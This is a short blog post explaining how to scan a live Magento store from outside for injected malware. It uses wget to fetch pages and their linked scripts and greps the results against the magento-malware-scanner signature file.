Magento External Malware Scans
Published: August 5, 2017
magento-malware-scanner is an extremely valuable tool to help keep your Magento installation secure. Scanning a codebase for malware is dead simple…
$ wget git.io/mwscan.txt $ grep -Erlf mwscan.txt /path/to/magento
However, it’s equally if not more important to run an external scan of your Magento installation. Here I’ll cover why and how.
Why Do I Need To Run An External Scan?
The reason you need to run an external scan is because simply scanning your codebase misses cases where the malware is injected into the database. This class of attack is extremely common because the attacker can install malware simply by accessing the admin panel and updating “miscellaneous html” or a CMS block and does not need access to the file system on the server.
How Do I Do It?
Fortunately, it’s not particularly difficult to run an external scan. You can use
wget to download the contents of a page and then send the returned HTML to magento-malware-scanner.
$ wget -O result https://www.example.com && grep -Elf mwscan.txt result
What If The Malware Is Not Inlined?
wget -O will catch cases where the malware is inlined into the HTML document, however if will miss if the malware is referenced via a
<script> tag. To solve this we can use the
-p flag to download the “page requisites”. This will scripts referenced via a
$ wget -p https://www.example.com && grep -Erlf mwscan.txt www.example.com
What If The Malware Is Hosted Elsewhere?
Good point, the
-p flag by default will only download the assets from the same host. We need to combine it with the
-H flag (span hosts) to download from other hosts
It’s easiest to additionally use the
-P flag (directory prefix) to put everything into a single folder
$ wget -p -H -P scan https://www.example.com && grep -Erlf mwscan.txt scan
At this point we will be scanning both all inlined and
Leveling Up Your External Scans
Scanning https://www.example.com is great, but what if the malware is in a static block that is only inserted into the page on the checkout page? In that case, we won’t catch it.
- Send a request to https://www.example.com/mwscanutils/contentdump. This endpoint will simply ALL the content from EVERY CMS page and block as well as the contents of the miscellaneous scripts and miscellaneous HTML fields.
- The ability to fetch the html for the checkout page via wget. Typically the request would be redirected due to the session not containing any quote items, however if you pass the mwscanutils_force param the page will still be loaded (https://www.example.com/checkout/onepage/index/mwscanutils_force/1) (Currently only in Magento 1 version).
Some Final Pro Tips
A couple final pro-tips with external scans…
- Regularly run both an internal and external scan against your Magento installation. Ideally you should be doing this on a cron. You can also use
-qflag to prevent it from making any noise.
- Run your external scans on dedicated server that is not the server that is hosting the Magento installation. If the attacker gains access to the Magento system they could simply disable the cronjob preventing you from ever getting any alerts.